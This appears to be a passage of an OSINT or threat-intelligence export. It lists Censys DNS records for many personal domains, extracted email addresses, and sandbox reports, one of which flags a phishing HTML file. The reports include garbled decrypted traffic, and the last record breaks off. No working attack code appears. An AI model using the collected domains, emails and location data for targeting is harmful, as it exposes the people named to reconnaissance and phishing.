| 2023-05-12 02:53:45 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:39:10.944Z", "ip": "2606:50c0:8002::153", "location_updated_at": "2023-05-08T10:38:44.903871Z", "autonomous_system_updated_at": "2023-05-08T10:38:44.903996Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.pixeli.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T23:50:00.966261596Z"}, "www.willbishop.dev": {"record_type": "CNAME", "resolved_at": "2023-03-06T20:23:13.520153960Z"}, "www.spncr.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:10.270076260Z"}, "www.rohanseth.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T00:00:27.264834898Z"}, "statereps.cicerodata.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T13:20:14.306282261Z"}, "www.asiavalentine.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:52:15.471978167Z"}, "catclicker.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:42:34.665120760Z"}, "www.omkardhande.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:55:27.721595395Z"}, "www.montferret.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:17:26.803641174Z"}, "www.guziyf.com": {"record_type": "CNAME", "resolved_at": "2023-01-15T05:57:21.072132005Z"}, "myreads.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-02-26T21:11:31.059545269Z"}, "web-dev.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:36.047967881Z"}, "greshnikov.net": {"record_type": "AAAA", "resolved_at": "2023-04-19T21:42:27.985888825Z"}, "svelte.calories.claas.dev": {"record_type": "CNAME", "resolved_at": "2023-04-04T16:51:51.844422366Z"}, "namco.dev": {"record_type": "AAAA", "resolved_at": "2023-01-19T14:14:45.143590011Z"}, "www.tcamba.dev": {"record_type": "CNAME", "resolved_at": "2023-03-23T17:56:56.616082497Z"}, "thaecohvah.syntactic-sugar.design": {"record_type": "CNAME", "resolved_at": "2023-04-23T09:37:19.694810939Z"}, "liangxiayi.com": {"record_type": "CNAME", "resolved_at": "2023-03-04T14:30:08.595680200Z"}, "mst.biuxbiu.design": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:39:08.436586135Z"}, "kbau.dev": {"record_type": "AAAA", "resolved_at": "2023-02-27T15:42:55.285099290Z"}, "www.kazusato.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:18.300056949Z"}, "cuillere.dev": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:59:59.805050461Z"}, "www.srinivasreddy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:53.148982927Z"}, "www.cliu.dev": {"record_type": "CNAME", "resolved_at": "2023-03-24T23:25:10.893500128Z"}, "kaiseki.coderfin.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T16:02:42.934790176Z"}, "www.robisonweb.dev": {"record_type": "CNAME", "resolved_at": "2023-02-28T15:51:22.213479983Z"}, "www.biobyelogy.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T13:52:36.509893227Z"}, "trubbylove.laury.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:26.457996047Z"}, "blog.hiluohao.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:57:36.831718722Z"}, "www.yusry.de": {"record_type": "CNAME", "resolved_at": "2023-04-23T16:48:40.403075909Z"}, "data-observability-tag.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:12.630016737Z"}, "siuts.proekspert.ee": {"record_type": "CNAME", "resolved_at": "2023-02-08T17:06:34.527975069Z"}, "www.zaddytech.com": {"record_type": "CNAME", "resolved_at": "2023-01-28T14:19:48.513264436Z"}, "www.dannytran.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:34.941987381Z"}, "www.breakingtheboycode.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T23:07:16.593181704Z"}, "yanshouwang.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:54.271513621Z"}, "www.hiennguyen.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:59:42.443779889Z"}, "fikihfirmansyah.my.id": {"record_type": "AAAA", "resolved_at": "2023-03-01T16:36:29.300419626Z"}, "database.jiny.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:19:55.315272389Z"}, "www.shaneporter.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:20:35.708785655Z"}, "blog.brandonmathis.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T21:08:33.485121539Z"}, "blog.limeira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:35.974650849Z"}, "v1.commandtech.dev": {"record_type": "CNAME", "resolved_at": "2022-10-31T15:01:33.036179596Z"}, "nfshibes.com": {"record_type": "AAAA", "resolved_at": "2023-04-19T17:29:58.637558645Z"}, "help.programm-chest.dev": {"record_type": "CNAME", "resolved_at": "2022-11-30T14:37:46.643013242Z"}, "flagicons.lipis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:16.844777559Z"}, "www.aashish.dev": {"record_type": "CNAME", "resolved_at": "2023-04-19T19:07:09.565393850Z"}, "mick.maccallum.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T16:19:47.687126527Z"}, "hkatz.dev": {"record_type": "AAAA", "resolved_at": "2023-03-22T11:14:05.854477536Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "daniel.zaturensky.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:13:57.894038790Z"}, "steezeburger.com": {"record_type": "CNAME", "resolved_at": "2023-03-19T14:57:50.497448263Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "www.changkaixin.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T16:00:04.814716347Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:59:11.184709249Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "msk.im": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:24:25.369430576Z"}, "status.brioxr.com": {"record_type": "CNAME", "resolved_at": "2023-01-19T12:58:47.712783317Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "www.bt1024.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:39:30.209694773Z"}, "willj.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:22.173071262Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.srcmax.com": {"record_type": "CNAME", "resolved_at": "2023-03-26T22:27:47.504722812Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "static.projectcodex.co": {"record_type": "CNAME", "resolved_at": "2023-03-28T12:56:47.903477609Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.jenniwu.dev": {"record_type": "CNAME", "resolved_at": "2023-04-24T17:00:00.073227865Z"}, "blog.ddamy.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:10:57.323553779Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "www.brandonfajardo.com": {"record_type": "CNAME", "resolved_at": "2023-03-12T13:33:44.576384321Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.pepijn.tech": {"record_type": "CNAME", "resolved_at": "2023-03-11T19:36:20.068693758Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "sam.haslers.info": {"record_type": "CNAME", "resolved_at": "2023-03-12T15:51:38.197844277Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "mteworld.ml": {"record_type": "AAAA", "resolved_at": "2023-01-04T15:21:01.487028696Z"}, "www.bsaiki.com": {"record_type": "CNAME", "resolved_at": "2023-03-05T13:41:36.534443343Z"}, "www.grantanna.dev": {"record_type": "CNAME", "resolved_at": "2023-02-27T15:42:47.651834600Z"}, "mirror.growingio.design": {"record_type": "CNAME", "resolved_at": "2022-12-20T14:28:15.483007528Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.colorbuilder.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:32.011890468Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "ulim216.cf": {"record_type": "AAAA", "resolved_at": "2023-02-19T12:42:56.171125280Z"}, "www.bytememo.com": {"record_type": "CNAME", "resolved_at": "2023-04-16T14:20:53.377584664Z"}, "bolifestudio.com": {"record_type": "CNAME", "resolved_at": "2023-04-01T14:40:33.850493899Z"}, "www.linking.fun": {"record_type": "CNAME", "resolved_at": "2023-03-28T17:44:25.016248815Z"}, "www.candidatekey.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T18:28:28.538888119Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, "carlelbaz.com": {"record_type": "CNAME", "resolved_at": "2023-05-05T14:11:09.059299062Z"}, "www.codar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}, "portfolio.gchahm.dev": {"record_type": "CNAME", "resolved_at": "2023-01-14T14:40:10.714963428Z"}}, "names": ["www.pixeli.dev", "www.thyagajan.in", "www.jenniwu.dev", "abeziou.dev", "web-dev.docs.inditex.dev", "blog.hiluohao.com", "www.bsaiki.com", | 2606:50c0:8002::153 |
| 2023-05-12 02:44:25 | IPv6 Address | No | DNS Resolver | 15 | 0 | 3 | 0 | None | 2600:1f18:2489:8202::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:00:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | occipy.recrutement@aftral.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 2, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'MSG-993046.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_3fc_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1020"\n "IsoScope_3fc_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_3fc_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_3fc_ConnHashTable<1020>_HashTable_Mutex"\n "IsoScope_3fc_IE_EarlyTabStart_0x9c4_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_3fc_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "getbootstrap.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "104.17.25.14:443"\n "172.67.30.148:443"\n "65.8.158.55:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1189.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1178.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: 00000000-00001020]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002584]\n "Tar1189.tmp" has type "data"- Location: [%TEMP%\\Tar1189.tmp]- [targetUID: 00000000-00002584]\n "HTTJFRWH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HTTJFRWH.txt]- [targetUID: 00000000-00001020]\n "_172C582D-B9D2-11ED-B010-08002708D069_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: 00000000-00001020]\n "search_2_.json" has type "JSON data"- [targetUID: 00000000-00001020]\n "52H103H9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\52H103H9.txt]- [targetUID: 00000000-00001020]\n "RYIH22IO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RYIH22IO.txt]- [targetUID: 00000000-00001020]\n "~DFD0DF213BBF0CD101.TMP" has type "data"- Location: [%TEMP%\\~DFD0DF213BBF0CD101.TMP]- [targetUID: 00000000-00001020]\n "Cab1177.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab1177.tmp]- [targetUID: 00000000-00002584]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "floating-labels_1_.css" has type "ASCII text"- [targetUID: 00000000-00001020]\n "K4HM6RP3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K4HM6RP3.txt]- [targetUID: 00000000-00001020]\n "Tar1178.tmp" has type "data"- Location: [%TEMP%\\Tar1178.tmp]- [targetUID: 00000000-00002584]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: 00000000-00001020]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "GXM745UA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GXM745UA.txt]- [targetUID: 00000000-00001020]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: 00000000-00001020]\n "core.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: 00000000-00001020]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001020]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /zepto.min.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: zeptojs.com\nDNT: 1\nConnection: Keep-Alive"\n "}iwH+H0S/qyn[vT]I6PEF.H=D7"#O{u]nNgI_^)-rK\n8K2d/7N<q}4\nb}[4x(e)`Di%)e{OYoe_|*\'YF+fvTdD?\no|Q69wb!/$(97M^w7rdd,/qMrS>ud~U_{i.We{O~.^R=9nO8D|a3?%zZ&)9ql>O0Y{2uSVRd.(:4Ioa~\'iLONx].:gw?zD)u3q6(}}{yYz>=mSjay^O@XFrueeKM&W$.(XbqB|:{\'_>\n\\Zl#}oVD{/2\\\'%U{Fh*n\\e33ao3%5G\nT+x9,4ATdmRt~Xf5HQ4rQ,2,HROF|$5EgKoh%/&grNm"%!\n eE~K)n`lhPO?~|8("CE>r\\BOLZ4M_QDl},YSU{>5{IxTj\'\n4UYRUg+pFc5C<SaOpP]5=r>i=y$e?<_ae\\N.a-+:jJ%~fFn~7SQ%`fD01,k6ln-pDA|B]u\nA,E1@n9q:~EYGb^t*{EO[^]/#qtmu2O{|rDY!KQX_VOm?bXP2xG//O_l\'b?}DvVn3[Is.j$-MD\n|ryVWvHuT\'MyWE.]M?N6]j+Kuo*x$JS`", "zIbIJ*SdIo:>)&a0+\n\n\n%wX|1au&kdAMsFBz#E=>9Ik*|\'\\xM=Of3"#O^T[)gO;-=z|,~s~^--e=J$K.9+,#_%up%YVvh6N9gwFdR$]}}b}W1`tKm*n2~U#NQGj=dtDAbe-fVR5!jA^02\n;a0u&|HO#R:>vzY%6Mg%.WXO!*z,f!q,;\'A@ eT7#^<{\n9iM0D{Jk7?A$4\\_{riP&4K4$\n"2)V\n9UW7-8:W*,0!XyPWwN)@BVu2*yRarH*UO9MN|\nSPv5Q#I<2#T%$jgnr/a${NT`q=JQcc00C$\n:XMdb;<kf-TdL&F:]>OH\n\nxVOw^`FQwh{=5V$. a\'vbx&w\\nw?,loBn4Fm0i;hRQ[y+?]$W?77%5%>h#Ou\n\nje5`D#3ZUl4+22OO!\n3;:~3rq)VTM_v\\Q{sd2/.GaRCn0bea]0!\\%\n#HJA@N]\n=/RqqADMV(k@P,uX7mFHsa9B`2d>7d1lvPta75%QP;AJnX[q7];VlJ;P9%?{ATtK` f0qc^SSS33KakB=Sk,"\n "6uFRyl8xyC94{.>b$+hl "R4Qa$>+\\RzFz?|A!]9&4sd42P9\\nJ.p^~WjKN$Q~~@%4!Uk;LKdkbP9imKvlK+$RV;j=Zd< SkROuT_cAKi@r\nQ8(6R.4kE(oHK7CCMn TyQ<~\n~O[njWWvC2i9`igdP*kAQPc3F(\\)=)\n-p[nI]\\:sb:yV|\na :5T\'WgG+Gfj\nj71j28X+5` i;v&]|g\'Lyyp(.OSVdh4yVTXUx&v=$nlPDR a" 95@GA\nSp*\n.X3Km6x0[6ek)kX"Z0W8?Zs?64_Q(YER(Zp>]OU,#)_z<[\\![;34S[5+\'/p*1A_kU" :lrb^HXO3K9> Dn=VT\'TOd$IDLL7Y{a.R1a"q%\'A@uVh}n$AAM+/z5:RqaSR+?UFNaTQXNMl*?8`l3&!</i\'{.g^URVmquGy|hi1l4nc8[Sph]NV+-6v+yJ|BSC{t]u`mqu,ZoVp"Uv4pH%\nzdFV9NJl!</a~ICZOE$ul97;o)FZz:^{Y3d(\n=:hO`q\'&q3+OJ", "i$M/jD6:~QWk\n31X\'Pz:=tI}O V(#ol~[yjGMq7H_{~y9h`}r*\\\nqFWNGA]k%WQeby1P iYSDv44kOEl>j>~qRQ"sTnD2$yE*`764W,AM/deo~^[8o[6}+]%Dd7jAJH|B9xJ$Pi_u:D:,QD}gw?_aYO>MSnZ4Iuhp]awc1b"q)NU^ht{O\'1b_9*N6pj!EHJ}58RCiHk7|iJ\\0hVP]B^X.)5:hat^=-]\n;"%W*&zKJT-XsF[hMimjBTh3aZF?>v,#/u/R;|;x}SZFc@NWP/q}]gBn)JuCdV[_w&4\\"tk\'j^Yv\nnl&usOrk=4G78!o7%4;o(;ho\nrpjw<|xPj@9FcB*F44RH[O6@-a(CfYN#@KTPhCgg5l+\nEG*TbHW\'n[.Jw;=?$1p*[:f`@R\nOnUh-dM|Zb\\=&6q*":9fRJyi}&;&{F9eN:,~fdlQP%%Y5)iT!=M\\u8gj\n~azFM>UY/%HM4\'ZX}>apT|rQSwnl6}iQo&XZy)j<\nh$.yI*CS{kHb-oG89mWm\n3m<64[DN911jb]w>^x}7|[p"\n ":$V\nyrUJX&d+Q=CIkqs\n7FN/F02cXOcpALsD8h>o#=,$5&YEShDkTPX\nK$|D$vs.81bCDk|?!G/<*PyLP5YDi!UB9GJ^YEPLB!G8T3y#ed#\\/86&Qq~.*I 9|G9f:#3C3mq=GyLt=#T9~,>((A#oN"lXq*~y@YRi\nit7f;.lEvG+]v&- 7T9ZmwNTv`ij(~X".Od;\'0R2W3.I97u"NO4\n\nbGRnV1m\' C27^k"J%{h<AO0\nY|>.|a}NS)o4C8k\n57hZ5?*zGOj:3"qNS9rD:rwbX+y^\'5Z#-]q\n`c[LF}f.!F ExhVZy(l$y^IT~1gw.$SKKl1u|VgII9jUY^/I~U:y&YM_MU$A_X?f2&FSs9qA8<o{<!asBe6;{lyTt\\5zv8^ k\n@_QZ8f4IV[dmT_-Z }=y%~>v\\@YH&UE\n,:B9ji6f17;YOYr//NliJb6JdO@t)8Swd23Iu@+sjC9iV&T~iG>[+lUyF2|&2q#.Iu\\`^/ n\'a9nu!Q"8Qg/H%\nY\nI63j!T-2auX"`ODv`P2,H\\w"\n ">xoJ\nEFWMKc 8`{&+!jg<p5e{RS#^Lg&Sl1L,fRLUr#t8sdu64d<-CN\\yw|bavBQ@L*t4}-/h}Bg>\nsuiOaOwx(s#[2ui))^?4Kc}=!b0pgpzpBw)Waos"bOz\n4Y3^|z$X>{~I#U^\']\nBfowrt7[G\n-g>a#\nOFia|):&o2YypQ(?1g5\'Na;1GW7h{asC^S)i*bd5br;2p7epKL1i? o#aIkC\\w6\'&ECfjX;\'^=VNJ)N$X&"QQ)Z(Xs#\'z&Z/[F-%$;7^IG|"C*[WcnZllK.R5W~zcjE-SsZtUyO=w$yd7aL|y9>UN0w:$RwixC7Xxcw9DlMgaHVLddU:<7>kRMWXg8skw0)I"!@MG\nO^Q)L7q~h`9gOIp[oo7b;\'Poxi7NJBb oA~y"hCvW;41PA\\)\ny<=\nf//gO_sN6I*Q]Kpd^<}_|Kc^O6rJ`t^eQ1IsN\n7<LPgjpHg"bEy[!Zd#m |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maxx Hotel (Net ID: 00:02:2D:1F:6F:03) | 50.1188, 8.6843 |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | contact@luckycarrotapp.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://urldefense.com/v3/__https:/luckycarrotapp.com/organization-b2__;!!FBg0PJ8GdnjP4Q!8c3hK7I-XFYCk7Nsu_a_9ZxOtOzs4BD4Qzz4xaaEEmIdhXPGsEafhFGfqwLPGWafWHCBltJqzsIwT7XW_a2-1-v3BYjmMONK6mxg0p8$', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f94_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f94_IESQMMUTEX_0_519"\n "IsoScope_f94_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3988"\n "IsoScope_f94_IESQMMUTEX_0_331"\n "IsoScope_f94_IE_EarlyTabStart_0xe00_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_f94_ConnHashTable<3988>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.80.202.17:443"\n "172.66.43.26:443"\n "20.38.109.4:443"\n "104.16.187.65:443"\n "104.18.230.83:443"\n "185.199.109.153:443"\n "104.18.136.59:443"\n "157.240.22.25:443"\n "104.16.121.190:443"\n "77.88.21.119:443"\n "104.18.25.196:443"\n "104.17.99.172:443"\n "104.16.136.206:443"\n "74.125.137.156:443"\n "104.19.154.83:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.producthunt.com"\n "assets.calendly.com"\n "buttons.github.io"\n "connect.facebook.net"\n "js.hs-analytics.net"\n "js.hs-banner.com"\n "js.hs-scripts.com"\n "js.hsadspixel.net"\n "js.hsforms.net"\n "js.usemessages.com"\n "luckycarrot.blob.core.windows.net"\n "mc.yandex.com"\n "mc.yandex.ru"\n "stats.g.doubleclick.net"\n "track.hubspot.com"\n "urldefense.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<meta property="twitter:image" content="https://luckycarrotapp.com/images/carrot-logo1111.png">" (Indicator: "twitter")\n "<meta property="twitter:title" content="Peer to peer recognition" />" (Indicator: "twitter")\n "<meta property="twitter:description" content="The best way to recognize and reward employees for their hard work. Boost employee engagement and motivation with Lucky Carrot." />" (Indicator: "twitter")\n "<img height="1" width="1" src="https://www.facebook.com/tr?id=2186666338068573&ev=PageView&noscript=1" alt="facebook" />" (Indicator: "facebook.com")\n "<button class="button btn-fill-orange watch-video-btn video-modal" title="Watch a Video" 